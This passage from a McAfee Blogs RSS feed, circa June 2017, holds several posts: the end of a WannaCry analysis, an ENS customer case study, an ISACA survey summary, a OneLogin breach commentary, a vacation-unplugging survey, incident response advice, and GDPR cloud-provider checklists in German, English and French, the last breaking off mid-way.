Thanks to care taken with data sanitization (such as that shown in Figure 25) and the correct use of CryptDestroyKey, WannaCry keeps the user’s private key in a nonencrypted form for the shortest possible time. Thus private key recovery is impractical beyond exploiting issues in the Windows APIs (as described by other authors).

Although the attacker’s motive may remain unknown for some time, we commend the response from victims, who have generally decided to not pay. Our research continues into this campaign; we will release more data as more information arises.

The post Is WannaCry Really Ransomware? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/executive-perspectives/wannacry-really-ransomware/feed/ 0
Why This California State Agency Compares McAfee ENS to a New Car https://securingtomorrow.mcafee.com/business/california-state-agency-compares-mcafee-ens-new-car/ https://securingtomorrow.mcafee.com/business/california-state-agency-compares-mcafee-ens-new-car/#respond Thu, 08 Jun 2017 14:00:57 +0000 https://securingtomorrow.mcafee.com/?p=74724 “If you think of endpoint protection as a car,” says Security Engineer Jeff Bowen at the California Department of Water Resources (DWR), “with McAfee ENS, we now have the latest model, with the best instrumentation, nicest features, and all the bells and whistles.” His CISO agrees. “With McAfee ENS, we remediate faster, have less business …

The post Why This California State Agency Compares McAfee ENS to a New Car appeared first on McAfee Blogs.

]]>
“If you think of endpoint protection as a car,” says Security Engineer Jeff Bowen at the California Department of Water Resources (DWR), “with McAfee ENS, we now have the latest model, with the best instrumentation, nicest features, and all the bells and whistles.”

His CISO agrees. “With McAfee ENS, we remediate faster, have less business disruption, make better decisions, and protect neighboring workstations and our overall environment—instead of focusing all our attention on an infected workstation while another one gets hit,” notes Chief Information Security Officer Richard Harmonson.

The largest of 30 departments within the California Natural Resources Agency (CNRA), the DWR provides technology infrastructure-as-a-service to the entire state agency. Harmonson and his security team purchase, deploy, and provide multi-tenancy security solutions across the CNRA’s 16,000 endpoints. In the past, the DWR provided another vendor’s endpoint solution to CNRA departments, but that product’s limited visibility, very high false positive rate, and dated technology— “the typical anti-virus product that we’ve seen for the past two decades”— drove Harmonson and his team to seek a better solution.

The DWR information security team found what it was looking for in McAfee ENS version 10.5, which it rolled out across all 4,000 end-user physical devices within DWR. DWR will deploy ENS across the remaining CNRA departments in the coming months, and eventually across virtualized servers as well.

So why is Harmonson and his staff as delighted with McAfee ENS as with a new car?

Three main reasons.

First, improved protection and detection. “Since we rolled out McAfee ENS, we have been detecting and blocking threats we didn’t see before,” claims Harmon. That’s because its Real Protect machine learning behavioral analysis technology catches more malware and its Dynamic Application Containment (DAC) functionality immediately quarantines unknown threats so they can be analyzed and protect Patient Zero from damage.

Second, improved decision making that enables faster response and remediation. According to Harmonson, this is one of the greatest benefits thus far since deploying McAfee ENS. “McAfee ENS is providing us with more and better information to help us better understand the threats that enter our environment,” he says.  Instead of having to wait 24 hours for its anti-virus vendor to create a new signature, DWR is “getting to the point where we can investigate an incident and resolve it within one to four hours.”

Third, ability to take advantage of McAfee Data Exchange Layer (DXL) integration.  McAfee ENS is built to leverage DXL. With the DWR’s recent addition of a McAfee Advanced Threat Defense (ATD) sandboxing appliance and soon-to-be-deployed McAfee Threat Intelligence Exchange and McAfee Endpoint Threat Defense and Response, the organization will be able to share local and global threat information in near real-time among these systems. With these additional McAfee tools, Harmonson expects to create a more adaptive, sustainable threat defense lifecycle that reduces the administrative burden on staff even further, which is especially important since adding staff with the right skill set can be a challenge.

Because of his experience thus far, Harmonson encourages colleagues and counterparts in other California state agencies to consider McAfee ENS. “With the layers of protection that [McAfee ENS] provides, it far exceeds the stereotypical anti-virus product,” he says. “I really appreciate how it provides my staff with the relevant information at their fingertips, helps them understand what happened, accelerates response time, and mitigates risk.”

To read the full case study on the California Department of Water Resources, here. Get your questions answered by tweeting @McAfee_Business.

The post Why This California State Agency Compares McAfee ENS to a New Car appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/california-state-agency-compares-mcafee-ens-new-car/feed/ 0
Majority of organizations expect cyberattack this year https://securingtomorrow.mcafee.com/business/optimize-operations/majority-of-organizations-expect-cyberattack-this-year/ Wed, 07 Jun 2017 21:38:41 +0000 https://securingtomorrow.mcafee.com/?p=74878 A majority of organizations think they will experience a cyber security attack this year, and many are not prepared, according to a new report from ISACA, a global association that helps individuals and enterprises optimize their use of technology. ISACA’s State of Cyber Security report, based on a survey of more than 600 security executives …

The post Majority of organizations expect cyberattack this year appeared first on McAfee Blogs.

]]>
A majority of organizations think they will experience a cyber security attack this year, and many are not prepared, according to a new report from ISACA, a global association that helps individuals and enterprises optimize their use of technology.

ISACA’s State of Cyber Security report, based on a survey of more than 600 security executives worldwide, shows that four out of five organizations think they will be attacked this year. Only 46 percent of those organizations have confidence in their cyber defense teams.

“There is a significant and concerning gap between the threats an organization faces and its readiness to address those threats in a timely or effective manner,” said Christos Dimitriadis, ISACA board chair and group head of information security at INTRALOT. “Cyber security professionals face huge demands to secure organizational infrastructure, and teams need to be properly trained, resourced and prepared.”

Among the other key findings of the research is that cyber security budgets are still expanding, but more slowly. Half of the respondents (50 percent) anticipate budget growth over the next year, which is down from 61 percent last year.

Enterprises continue to have difficulty finding qualified personnel. Only 30 percent receive 10 applicants or more for an open position, of which less than half are qualified. At the same time, the threat environment is increasingly hostile, with 53 percent of respondents reporting an increase in attacks in 2016.

The Internet of Things (IoT) is replacing mobile technology as a major area of concern. IoT concerns show no sign of slackening, the report said. And ransomware is expanding, but the processes to address it are not. About two thirds of organizations (62 percent) experienced ransomware attacks in 2016, but only 53 percent have a formal process in place to address it.

 

This article was written by Bob Violino from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Majority of organizations expect cyberattack this year appeared first on McAfee Blogs.

]]>
Customer Data Exposed in OneLogin Data Breach https://securingtomorrow.mcafee.com/business/customer-data-exposed-onelogin-data-breach/ https://securingtomorrow.mcafee.com/business/customer-data-exposed-onelogin-data-breach/#respond Wed, 07 Jun 2017 17:05:35 +0000 https://securingtomorrow.mcafee.com/?p=74843 From Azure to AWS – cloud adoption is booming, which has security professionals trying to find the right formula for securing the cloud. Now, a new data breach at OneLogin, whose business is providing secure access to multiple cloud applications, has reaffirmed the need for cloud security. How did the breach happen? It’s unknown exactly …

The post Customer Data Exposed in OneLogin Data Breach appeared first on McAfee Blogs.

]]>
From Azure to AWS – cloud adoption is booming, which has security professionals trying to find the right formula for securing the cloud. Now, a new data breach at OneLogin, whose business is providing secure access to multiple cloud applications, has reaffirmed the need for cloud security.

How did the breach happen? It’s unknown exactly how they obtained them, but hackers accessed AWS keys and used them to enter the vendor’s environment for hours before abnormally high activity in the OneLogin database alerted the internal team that something was awry. And once aware, it took the team only minutes to shut down the AWS instances and retire the AWS keys to prevent further access. But, of course, there was already a fair amount of damage done.

The cybercriminal responsible was able to access databases with information about users, apps, and various types of keys. That data is encrypted, but there is high suspicion that it may have been decrypted by the threat actors. As McAfee CTO Steve Grobman has said, encryption is, at the end of the day, just math—math that hackers can easily figure out with enough compute power.

The reason OneLogin was attacked was to steal these credentials, which is part of a larger trend that our McAfee Labs 2017 Threats Predictions report anticipated. Passwords, and the people who create and use them, will remain the biggest weakness throughout most technologies for the foreseeable future. Cloud authentication is no different and actually represents a much bigger payoff for thieves. The proliferation of cloud apps and services, and human fondness for using the same or similar password for each cloud service, exacerbates the problem.

This breach may, in part, also stem from insufficient database and cloud security procedures, but it brings up a larger issue regarding identity and password management tools. Users place much trust and faith in the services where they store their passwords to their work and personal accounts. Breaches require them to go through a series frustrating steps to secure those accounts, including generation of new API credentials and OAuth tokens. A OneLogin customer who spoke with Ars Technica said they were having to “rebuild the whole authentication security system… OUCH!”

The attack vectors in this breach also require companies to ask some critical questions. For example, should they make a policy to retire AWS keys after 30, 60, or 90 days? How is an attacker able to access decryption keys for such an important set of data stored in a database? Organizations need to rethink how and where they store data, as well as encryption keys.

For more information about this breach and others like, make sure to follow @McAfee and @McAfee_Business.

 

 

The post Customer Data Exposed in OneLogin Data Breach appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/customer-data-exposed-onelogin-data-breach/feed/ 0
Connected Vacations: Top Takeaways from Our Unplugging Survey https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/connected-vacations-top-takeaways-from-our-unplugging-survey/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/connected-vacations-top-takeaways-from-our-unplugging-survey/#respond Wed, 07 Jun 2017 04:01:14 +0000 https://securingtomorrow.mcafee.com/?p=74803 It’s June, which means the sun is shining, schools out, and it’s time for a family summer vacation! Whether you’re jet-setting to Hawaii or backpacking through the mountains, vacations are a great excuse to take a break from your connected devices, and enjoy face-to-face quality time with loved ones. Not to mention, unplugging from your …

The post Connected Vacations: Top Takeaways from Our Unplugging Survey appeared first on McAfee Blogs.

]]>
It’s June, which means the sun is shining, schools out, and it’s time for a family summer vacation! Whether you’re jet-setting to Hawaii or backpacking through the mountains, vacations are a great excuse to take a break from your connected devices, and enjoy face-to-face quality time with loved ones. Not to mention, unplugging from your devices while on vacation can also help with personal security. However, even though most people want to unplug, how often do they actually remain disconnected? We decided to take a look and surveyed more than 2,000 people, aged 18-55 years old, to examine their behavior and attitudes towards their connected devices while traveling.

People Want to Unplug, but Don’t Feel Like They Can

Out of those surveyed, 43% of people went on vacation with the intent to unplug, and out of that 43%, 81% reported having a more enjoyable vacation because of the lack of connectivity. For those that didn’t, they most likely wished they could’ve. In fact, if work obligations were not a factor, 57% of individuals would prefer to completely unplug on vacation. This is most true for younger workers in their 20s and 30s, with 69% claiming they would want to completely unplug vs. less than half (49%) of individuals in their 40s.

Beyond work obligations, vacationers want to stay in contact with loved ones, with 62% claiming they stayed connected to be reachable by friends and family.

So, for those that simply had to stay connected, what were they glued to the most?

More than half of people (52%) indicated that they spend at least an hour a day on vacation using their connected devices, with 38% saying they couldn’t last more than a day without checking email (work or personal), 37% not lasting more than a day without checking social media, and more than half (54%) not lasting more than a day without texting.

Incentives for Unplugging

So out of those who did in fact unplug, why exactly did they do it? The main reasons survey respondents reported for unplugging varied, but the top ones include: being in the moment (69%), the need for stress relief (65%), taking a break from work (44%), and being respectful of others (36%). In fact, according to another recent McAfee survey, 40% of individuals felt their significant other paid more attention to their own devices when they were together one-on-one and 45% reported getting into an argument with a friend, significant other, or family member over being on a device while together.

Staying Secure While Staying Relaxed

So now, the next question is, if travelers do choose to stay connected while on vacation – are they doing so securely?

Whether they’re using Wi-Fi in the airport, or emailing in their hotel room, vacationers tend to have personal security lower on their list of priorities while they’re out of town. When it comes to Wi-Fi security specifically, 58% of respondents know how to check if a Wi-Fi network is secured and safe to use, but less than half (49%) take the time to ensure their connection is secured. Twenty percent don’t think about the security of their Wi-Fi network at all, and for 32% it depends on how badly they need to connect to Wi-Fi if they check the security of the network. We also found that parents tend to be more security-minded than their non-parental counterparts, and are more likely to know if their Wi-Fi connection is secured and safe to use (63% of parents vs. 54% of non-parents).

So, if you do chose to remain plugged in while on vacation, makes sure to keep these security tips in mind:

-Browse securely when away from home. It can be tempting to use your connected device while on vacation. If you can’t resist be sure that you are connecting securely. Avoid public or unsecured Wi-Fi networks which can expose your personal data and information to a cybercriminal. If you absolutely must connect to a public Wi-Fi network, use a Virtual Private Network (VPN) like McAfee Safe Connect. A VPN will keep your information encrypted and ensure that data goes straight from your device to where you are connecting.

-Update your devices. The first line of defense for your devices is you, so it’s important to take a few precautions to stay safe. Make sure your devices’ operating system and applications are up-to-date. Using old versions of software could leave you open to potential security vulnerabilities.

-Install comprehensive security. After you’ve updated your devices with the latest software install comprehensive security. A solution like McAfee LiveSafe can ensure your devices stay clear of viruses and other unwanted malware.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Connected Vacations: Top Takeaways from Our Unplugging Survey appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/connected-vacations-top-takeaways-from-our-unplugging-survey/feed/ 0
Vorbereitung auf die Datenschutz-Grundverordnung 2017, Teil 3: Wichtige Fragen, die Sie Ihrem Cloud-Anbieter stellen sollten https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-3-wichtige-fragen-die-sie-ihrem-cloud-anbieter-stellen-sollten/ https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-3-wichtige-fragen-die-sie-ihrem-cloud-anbieter-stellen-sollten/#respond Tue, 06 Jun 2017 22:12:22 +0000 https://securingtomorrow.mcafee.com/?p=75176 Dies ist der dritte Teil einer Reihe von Blog-Beiträgen, mit denen Sicherheitsverantwortliche und Führungskräfte in Unternehmen auf die Datenschutz-Grundverordnung (DSGVO) 2017 vorbereitet werden sollen.   Denken Sie über eine Verschiebung von Anwendungen in die Cloud nach? Wenn ja – und welches Unternehmen tut das nicht – haben Sie an die Auswirkungen der EU-Datenschutz-Grundverordnung (DSGVO) auf …

The post Vorbereitung auf die Datenschutz-Grundverordnung 2017, Teil 3: Wichtige Fragen, die Sie Ihrem Cloud-Anbieter stellen sollten appeared first on McAfee Blogs.

]]>
Dies ist der dritte Teil einer Reihe von Blog-Beiträgen, mit denen Sicherheitsverantwortliche und Führungskräfte in Unternehmen auf die Datenschutz-Grundverordnung (DSGVO) 2017 vorbereitet werden sollen.

 

Denken Sie über eine Verschiebung von Anwendungen in die Cloud nach? Wenn ja – und welches Unternehmen tut das nicht – haben Sie an die Auswirkungen der EU-Datenschutz-Grundverordnung (DSGVO) auf diese Pläne gedacht?

 

Bei McAfee sind wir der Überzeugung, dass die DSGVO eine Chance für einen Sicherheitswandel bietet – eine Möglichkeit, einen Compliance-orientierten Sicherheitsansatz zu verwerfen und zu einer Strategie des Datenschutzes und der konzeptionellen Sicherheit überzugehen.

 

Die DSGVO distanziert sich von früheren Compliance-Systemen, und anstatt eine Checkliste von Sicherheitstechnologiekontrollen vorzugeben, verlangt sie nun von den Unternehmen, nachhaltige Sicherheitsfunktionen zu entwickeln. Sie bietet Ihnen daher eine Chance, Ihre gesamte Daten- und Sicherheitsstrategie zu überprüfen und Ihre Widerstandsfähigkeit zu stärken, anstatt Checklisten zu erstellen. Wir sind der Ansicht, dass die DSGVO eine Möglichkeit darstellt, Sicherheit als Schlüsselfaktor für das Geschäft zu betrachten, insbesondere als Schlüsselfaktor für die sichere Nutzung von Cloud-Diensten.

 

Ob Sie nun ältere Anwendungen in die öffentliche Cloud verlagern, einen Cloud-Speicher verwenden oder Cloud-basierte Geschäftsanwendungen wie beispielsweise Office 365 nutzen – in jedem Fall müssen Sie die konkreten Auswirkungen der DSGVO beachten und die Möglichkeit bedenken, eine breiter angelegte Cloud-Sicherheitsstrategie zu prüfen oder zu entwickeln.

 

Wir bei McAfee möchten, dass Ihr Unternehmen Ja zur Cloud-Nutzung sagt. Daher sind nachfolgend einige wichtige Fragen und Überlegungen aufgeführt, um mit Ihrem Cloud-Serviceanbieter auf Augenhöhe über die DSGVO und die erforderlichen Sicherheitsvorkehrungen sprechen zu können:

 

Verfügt Ihr Cloud-Serviceanbieter über eine Datenschutzrichtlinie? Solide und transparente Sicherheitsrichtlinien sind der erste Schritt. In vielen Fällen erfordert die DSGVO die Ernennung eines Datenschutzbeauftragten (DPO), der das Programm überwacht. Bitten Sie auch um ein Gespräch mit dem DPO bei Ihrem Cloud-Anbieter.

 

Wie nutzt Ihr Cloud-Serviceanbieter die erfassten Daten?

Anbieter sind verpflichtet, Ihnen mitzuteilen, wie sie ggf. die über den Dienst erfassten Daten nutzen und wie sie die Informationen schützen. Viele Unternehmen nutzen erfasste Daten für Analysen oder andere rechtmäßige Zwecke. Diese Prozesse sollten jedoch kein zusätzliches Risiko für Sie darstellen.

 

Welche Sicherheits-Rahmenbedingungen, -standards oder -zertifizierungen verfolgt Ihr Cloud-Servicanbieter oder haben diese für Ihren Dienst erreicht?

Es gibt diverse branchenspezifische Leitfäden und Prozesse, in denen standardisierte Anforderungen und Kontrollen für den Schutz von Cloud-Diensten angegeben sind. FedRAMP beispielsweise ist ein umfassender Prozess zur Autorisierung von Cloud-Diensten für die US-Regierung. Dieser Prozess basiert jedoch auf NIST und könnte in größerem Umfang genutzt werden. Auf internationaler Ebene gibt es die Norm ISO 27002, für die die Cloud Security Alliance zusätzliche Leitfäden bereitstellt. Cloud-Anbieter sollten eines der verfügbaren Rahmenbedingungen nutzen, um den Reifegrad zu bewerten und kontinuierlich zu überwachen.

 

Kann Ihr Cloud-Serviceanbieter einen Fall von Datenkompromittierung nennen und deren Reaktion darauf?

Statistisch betrachtet werden mehr als die Hälfte aller Datenkompromittierungen von externen Unternehmen entdeckt. Angesichts der Tatsache, dass die DSGVO eine Meldung innerhalb von 72 Stunden an die zuständige Aufsichtsbehörde ab dem Zeitpunkt der Entdeckung eines Vorfalls durch das Unternehmen verlangt, ist es überaus wichtig, dass man über die Fähigkeit verfügt, potenzielle Datenkompromittierungen zu erkennen und mit einem bewährten Prozess entsprechend zu reagieren. Fragen Sie Ihren Cloud-Anbieter, ob er über ein Sicherheitskontrollzentrum (SOC) oder ein Reaktionsteam für Computersicherheitsvorfälle (CSIRT) intern oder als verwalteter Service mit den besagten Fähigkeiten verfügt.

 

Wo speichern und verarbeiten Ihr Cloud-Serviceanbieter die erfassten Daten?

Der Speicherort von Daten stellt möglicherweise das größte Problem dar, wenn es um Cloud-Dienste und die Vorbereitung auf die DSGVO geht. Verfügt Ihr Cloud-Anbieter über Rechenzentren in der EU oder ausschließlich in den USA? Wo speichert und verarbeitet er die Daten? Werden die Daten von der EU in die USA verschoben? Dies sind nur einige der Probleme in diesem Bereich, die jedoch mit der Verschlüsselung von gespeicherten Daten, der Zugriffskontrolle und der Schlüsselverwaltung gelöst werden können.

 

Dies waren sämtliche Überlegungen im Hinblick auf die DSGVO und Cloud-Serviceanbieter, obwohl dies keine erschöpfende Liste darstellt. Hoffentlich wurden Sie damit als Nutzer dieser Dienste hinreichend informiert und sind nun gut gerüstet, um sich auf die DSGVO entsprechend vorzubereiten. Diese Vorgehensweisen sorgen vor allem jedoch für eine sicherere Cloud-Nutzung seitens der Unternehmen.

The post Vorbereitung auf die Datenschutz-Grundverordnung 2017, Teil 3: Wichtige Fragen, die Sie Ihrem Cloud-Anbieter stellen sollten appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-3-wichtige-fragen-die-sie-ihrem-cloud-anbieter-stellen-sollten/feed/ 0
How To Plan For Security Incident Response https://securingtomorrow.mcafee.com/business/optimize-operations/how-to-plan-for-security-incident-response/ Tue, 06 Jun 2017 19:46:22 +0000 https://securingtomorrow.mcafee.com/?p=74834 Planning for the seemingly unlikely event of a severe cybersecurity incident seems unwieldy and time-consuming for many organizations. But consider this: According to the Ponemon Institute, 90% of organizations that go offline due to a cyberattack shutter their windows in the following two years. A strong incident response plan is clearly a necessity these days. …

The post How To Plan For Security Incident Response appeared first on McAfee Blogs.

]]>
Planning for the seemingly unlikely event of a severe cybersecurity incident seems unwieldy and time-consuming for many organizations. But consider this: According to the Ponemon Institute, 90% of organizations that go offline due to a cyberattack shutter their windows in the following two years.

A strong incident response plan is clearly a necessity these days. From threats like the recent WannaCry ransomware attack to the Google Docs phishing scam, there are a number of ways a security incident can unfold at your organization. Having a tested incident response plan in your back pocket can make the difference between a swift recovery or a high stress situation where every minute the incident remains unresolved results in more financial or reputational damage.

There are three fundamental components that will help ensure that your company’s incident response plan is a success.

Define security incidents and likely scenarios. While all IT service incidents deserve swift identification and triage, security incidents – which often have malicious intent – must be identified and tackled even more quickly. For example, a server at your company is unexpectedly rebooted in the middle of the day. This could be caused by an innocuous outage or it could be something far more sinister. Perhaps an unknown third party has installed a rootkit, and the system is restarting so changes can be applied allowing that third party unauthorized system access.

As you think through the possible incidents and scenarios, think about security best practices that can be circumvented (such as authentication) and cues from the news as your guide to recent, real threats (such as phishing and ransomware attempts).

What experts and stakeholders will be mobilized to handle all of the security, privacy and legal implications when a security incident occurs? How will your organization recover from a successful phishing attack? How will your organization cope with news of a severe data leak? What will you do once hackers are booted from your system? Play out each possible incident and how you would realistically respond. From there, write your incident response plan and procedures accordingly.

One resource to get you started is a generic incident handling procedure template from the Computer Security Incident Response Team. This is a good baseline document, but you’ll need to tailor it to meet your organization’s specific needs.

Communicate and train on the plan. Once your plan has been developed, reviewed and approved, the roles and responsibilities everyone plays should be disseminated to all relevant parties. An incident can be detected by anyone with the right “visibility.” Your IT team is obviously on the front lines for incident detection and response, but many people in your organization could end up identifying a problem first. Maybe your marketing team, who owns the website, notices some highly suspect traffic one day or encounters issues with the server. Do they know where to go? Any of your end users could click on a link in an email and realize afterwards that it seemed suspicious. Do they know who to call or email?

A hands-on and interactive way to ensure that key stakeholders know what role they play in incident response is to conduct tabletop exercises. A tabletop exercise is usually led by a security subject matter expert who walks a team of diverse stakeholders (from IT, security, management, legal, HR, etc.) through an impactful security incident scenario, facilitating the decisions made and providing feedback afterwards on how well the participants were aware of their responsibilities and the company’s policies. Tabletop exercises are one way of doing “red teaming” because they simulate how internal processes will play out if a real security incident gets reported and escalated.

Proactively mitigate your losses. A security incident that turns into a validated security breach can lead to devastating financial or reputational loss. Such losses are not easy to recover from, and in some scenarios, organizations never fully rebound. The Anthem Healthcare breach of 2015 came with a price tag well into the billions of dollars. And the code-hosting service, Code Spaces, went under in the months following its breach.

In addition to putting preventative best practice technical measures in place and preparing an actionable incident response plan, consider building relationships and lines of communication now with relevant government agencies, external legal counsel, digital forensics firms and potentially procuring cybersecurity liability insurance. All of these measures will be things your Board of Directors will and should expect you to have answers to, and communicating with your Board on these matters is an art unto itself.

In a world where it isn’t a question of “if,” but “when” your company may find itself the target of a cyber incident, a detailed incident response plan will be your lifeline to weathering the storm of security incidents in measurable ways. Executed well, it can help you demystify the what-if scenarios, decrease your panic about who will do what and plan through the worse-case scenarios to make sure you have all the experts and resources you need to handle any security incident scenario.

 

This article was written by Christie Terrill from Forbes and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post How To Plan For Security Incident Response appeared first on McAfee Blogs.

]]>
Preparing for GDPR in 2017, Part 3: Top Questions to Ask Your Cloud Providers https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-3-top-questions-ask-cloud-providers/ https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-3-top-questions-ask-cloud-providers/#respond Tue, 06 Jun 2017 16:00:01 +0000 https://securingtomorrow.mcafee.com/?p=74601 This is the third in a series of blog posts designed to help enterprise security and business executives prepare for GDPR throughout 2017.(Part 1, 2, 4) Thinking about moving applications to the cloud? If you are – and what business isn’t – have you considered the impact of the EU General Data Protection Regulation (GDPR) …

The post Preparing for GDPR in 2017, Part 3: Top Questions to Ask Your Cloud Providers appeared first on McAfee Blogs.

]]>
This is the third in a series of blog posts designed to help enterprise security and business executives prepare for GDPR throughout 2017.(Part 1, 2, 4)

Thinking about moving applications to the cloud? If you are – and what business isn’t – have you considered the impact of the EU General Data Protection Regulation (GDPR) on those plans?

At McAfee, we believe GDPR is an opportunity for security transformation – an opportunity to break a compliance-driven security approach and move to a secure- and privacy-by-design strategy.

The GDPR breaks from previous compliance schemes and, instead of dictating a checklist of security technology controls, requires organisations to develop long-lasting capabilities. As such, it presents an opportunity to review your comprehensive data and security strategy and build resilience rather than checklists. We believe that GDPR presents an opportunity for security to be seen as an enabler for business, and particularly an enabler to securely adopt cloud services.

Whether you are moving legacy applications to public cloud, adopting cloud storage, or consuming cloud-delivered business applications such as Office 365, you must consider the impact of GDPR specifically, and an opportunity to review or develop a cloud security strategy more broadly.

At McAfee, we want your business to say yes to cloud adoption, so here are some of the top questions and considerations for you to have an informed conversation with your cloud service provider about GDPR and overall security readiness:

Does your cloud service provider have a privacy policy?

Having strong and transparent security policies is the first step. In many cases, GDPR requires the appointment of a Data Protection Officer (DPO) to oversee the programme. Also ask to have a conversation with the DPO at your cloud provider.

How do you use the data collected?

Providers have a responsibility to disclose to you how they use, if appropriate, the data collected by their service as well as how they protect the information. Many organisations use collected data for analytics or other legitimate purposes. However, those processes should not create additional risk for you.

What security frameworks, standards or certifications do you follow or have you achieved for your service?

Several industry guides and processes exist that provide a standardised set of requirements and controls for protecting cloud services. FedRAMP, for example, is a comprehensive process to authorise cloud services for the US government but the process is based on NIST and could be adopted more broadly. Internationally there is ISO27002, for which the Cloud Security Alliance provides additional guides. Cloud providers should use one of the available frameworks to assess and continuously monitor maturity.

Can you identify a data breach and respond?

Statistically, over half of all data breaches are detected by external organisations. Given that GDPR requires 72-hour notification to the relevant supervisory authority from when you, the organisation, became aware of it, it’s critical to possess the capability to identify potential data breaches and have a rehearsed process with which to respond. Ask your cloud provider if it has an SOC or a CSIRT, either in house or as a managed service, with those abilities.

Where do you store and process the data that is collected?

Data residency is probably the number one concern when it comes to cloud services and preparation for the GDPR. Does your cloud provider have data centres in the EU or only in the US? Where does it store and process data? Is data moved from the EU to the US? These are just some of the concerns in this area but they can be resolved with proper data-at-rest encryption, access control and key management.

The above are all considerations when it comes to the GDPR and cloud service providers, although they’re not an exhaustive list. Hopefully this will help make you a more informed consumer of these services and start you on the way towards GDPR readiness. More importantly, these approaches will make for a safer business journey to the cloud.

 

The post Preparing for GDPR in 2017, Part 3: Top Questions to Ask Your Cloud Providers appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-3-top-questions-ask-cloud-providers/feed/ 0
Se préparer au RGPD en 2017 – Troisième partie : principales questions à poser à votre fournisseur de services de cloud https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-troisieme-partie-principales-questions-poser-votre-fournisseur-de-services-de-cloud/ https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-troisieme-partie-principales-questions-poser-votre-fournisseur-de-services-de-cloud/#respond Tue, 06 Jun 2017 15:37:15 +0000 https://securingtomorrow.mcafee.com/?p=75040 Cet article de blog est le troisième d’une série dont le but est d’aider les dirigeants d’entreprise et les cadres responsables de la sécurité à se préparer au RGPD tout au long de l’année 2017.   Votre entreprise compte transférer des applications vers le cloud ? Si oui, elle est loin d’être la seule… Mais avez-vous songé …

The post Se préparer au RGPD en 2017 – Troisième partie : principales questions à poser à votre fournisseur de services de cloud appeared first on McAfee Blogs.

]]>
Cet article de blog est le troisième d’une série dont le but est d’aider les dirigeants d’entreprise et les cadres responsables de la sécurité à se préparer au RGPD tout au long de l’année 2017.

 

Votre entreprise compte transférer des applications vers le cloud ? Si oui, elle est loin d’être la seule… Mais avez-vous songé aux répercussions qu’aura le règlement général sur la protection des données (RGPD) de l’Union européenne sur ce projet ?

 

McAfee perçoit le RGPD comme une occasion à saisir de transformer la sécurité — la possibilité d’en finir avec une approche de la sécurité purement axée sur la conformité et de passer à une stratégie qui met l’accent sur la protection de la vie privée et la sécurité dès la conception.

 

Le nouveau règlement rompt avec les précédents paradigmes de la conformité et, plutôt que d’imposer les technologies de sécurité à mettre en œuvre, exige des entreprises qu’elles développent des capacités durables. Finies les longues listes de vérification… C’est le moment idéal de réexaminer l’intégralité de votre stratégie de sécurité et de protection des données pour renforcer sa résilience. Nous sommes convaincus que le RGPD contribuera à transformer la façon dont est perçue la sécurité informatique. Celle-ci devrait apparaître comme un vecteur de développement de l’entreprise et, surtout, comme essentielle pour l’adoption de services de cloud en toute sécurité.

 

Peu importe que vous migriez d’anciennes applications vers le cloud public, adoptiez une solution de stockage dans le cloud ou optiez pour des applications d’entreprise fournies sous forme de services de cloud facturés à l’utilisation telles qu’Office 365. Vous devez réfléchir à l’impact qu’aura le RGPD et profiter de l’occasion pour étendre votre stratégie de sécurité pour le cloud.

 

McAfee souhaite que votre entreprise ouvre sans crainte ses portes au cloud. Pour vous y aider, voici quelques questions et points importants à garder à l’esprit lorsque vous vous entretiendrez avec votre fournisseur de services de cloud. Vous pourrez ainsi aborder la question de la préparation au RGPD et de la sécurité en général en connaissance de cause :

 

Votre fournisseur de services de cloud dispose-t-il d’une politique en matière de protection de la vie privée ? La mise en place de politiques de sécurité fiables et transparentes constitue la première étape. Bien souvent, le RGPD exige la désignation d’un délégué à la protection des données chargé de superviser le programme. Demandez également à discuter avec le délégué à la protection des données de votre fournisseur de services de cloud.

 

Comment utilisez-vous les données collectées ?

Les fournisseurs sont tenus de vous renseigner sur leurs méthodes d’utilisation (le cas échéant) des données collectées par leurs services, ainsi que sur les mesures prises pour protéger ces données. Bien souvent, les données collectées sont employées dans le cadre d’analyses ou à d’autres fins légitimes. Ces processus ne doivent cependant pas vous exposer à des risques supplémentaires.

 

Quels cadres, normes ou certifications de sécurité avez-vous choisi d’adopter ? Ou avec lesquels vos services sont-ils en conformité ?

Il existe plusieurs cadres de procédures et guides sectoriels qui fixent une série standardisée d’exigences et de contrôles pour la protection des services de cloud. Par exemple, FedRAMP est un programme complet qui vise à délivrer des autorisations aux services de cloud à l’intention du gouvernement des États-Unis. Il s’appuie cependant sur des publications du NIST et son adoption pourrait se généraliser. Au niveau international, il y a la norme ISO 27002, pour laquelle la CSA (Cloud Security Alliance) fournit des guides supplémentaires. Les fournisseurs de services de cloud doivent s’appuyer sur l’un des cadres disponibles pour évaluer et surveiller en continu leur niveau de maturité.

 

Êtes-vous capable de détecter une violation de données et d’assurer une réponse efficace ?

